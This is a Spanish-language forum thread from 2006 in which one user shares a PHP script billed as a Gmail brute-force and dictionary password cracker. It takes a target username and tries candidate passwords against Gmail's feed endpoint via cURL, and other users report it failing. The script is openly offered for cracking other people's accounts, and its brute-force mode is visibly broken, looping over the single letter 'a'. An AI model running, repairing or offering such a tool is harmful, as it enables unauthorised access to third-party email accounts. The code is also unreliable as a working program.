Encontre por la red un script en php que sirve para sacar passwords de gmailpor fuerza bruta... A mi no me funciono pero pruebenlo ustedes y posteen sus observaciones.
<?php//////////////////////////Gmail-Brute/////////Mad-Hatter/////////////////////////////////////////////////# This script was created to Brute Force G-Mail Logins,##it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) #////////////////////////$dic ="your Dictionary file here.txt";///////////////////////echo "<title>Gmail Brute Force Attacker</title></head><style type='text/css'>body {font:Verdana, Arial, Helvetica, sans-serif;font-size:12px;border-color:#FFFFFF;}.raster_table {background-color:#444444;border-color:#CCCCCC;}.alert { color:#FF0000;}</style><body><table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'><tr><td><div align='center'><b>Gmail Brute Force Attacker</b></div> </td> </tr></table><table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'> </div> </td> </tr> <tr> <td> <div align='center'> </div> </td> </tr> <tr> <td> <div align='center'> <form method='post'> Username to brute:<br> <input name='username' type='text' /><br><br> <input name='attack' type='submit' value='dictionary' /> - <input name='attack' type='submit' value='brute' /><br> </form> </div> </td> </tr> <tr> <td> <div align='center'> </div> </td> </tr></table>";// Sets variables and retrives google error for comparingif(isset($_POST['attack']) && isset($_POST['username'])) { $username = $_POST['username']; $headers = array( "Host: mail.google.com", "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4", "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Language: en-us,en;q=0.5", "Accept-Encoding: text", # No gzip, it only clutters your code! "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7", "Date: ".date(DATE_RFC822) ); $c = curl_init('https://mail.google.com/mail/feed/atom'); curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output! curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised $wrong = curl_exec($c); // Get it curl_close($c); // Close the curl stream}//Dictionary Attackif($_POST['attack'] == "dictionary") { $Dictionary = file("$dic"); for ($Position = 0; $Position < count($Dictionary); $Position++) { $Dictionary[$Position] = str_replace("\r\n", "", $Dictionary[$Position]); if(check_correct($username, $Dictionary[$Position])) { die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div> </td> </tr></table></body></html>"); } } echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the dictionary attack.</b></div> </td> </tr></table>";}//Brute Attackelseif($_POST['attack'] == "brute") { for ($Pass = 0; $Pass < 2; $Pass++) { if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; } if(check_correct($username, $Pass)) { die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div> </td> </tr></table></body></html>"); } } echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'> <tr> <td> <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the brute force attack.</b></div> </td> </tr></table>";}echo "</body></html>";// Function for checking whether the username and password are correctfunction check_correct($username, $password){ global $wrong, $headers; $c = curl_init('https://'.$username.':'.$password.'@mail.google.com/mail/feed/atom'); curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output! curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1); curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised $str = curl_exec($c); // Get it curl_close($c); if($str != $wrong) {return true;} else {return false;}}?>
lo habia visto ya, lo mas seguro es que no te funciono por que tu servidor no soporta cURL, eso eslo que explican en milw0rm
Komtec1
Quote from: Komtec1 on December 10, 2006, 03:53:12 AM
lo habia visto ya, lo mas seguro es que no te funciono por que tu servidor no soporta cURL, eso eslo que explican en milw0rm
Komtec1
ya lo probe en un servidor que soporta curl, pero aun asi no saca el password, porque hice una cuenta con una contraseƱa de las primeras que "testea" el script y nunca me dijo que esa era la contraseƱa ???
nose ami tampoco me funciona... pero seguro que algo hago mal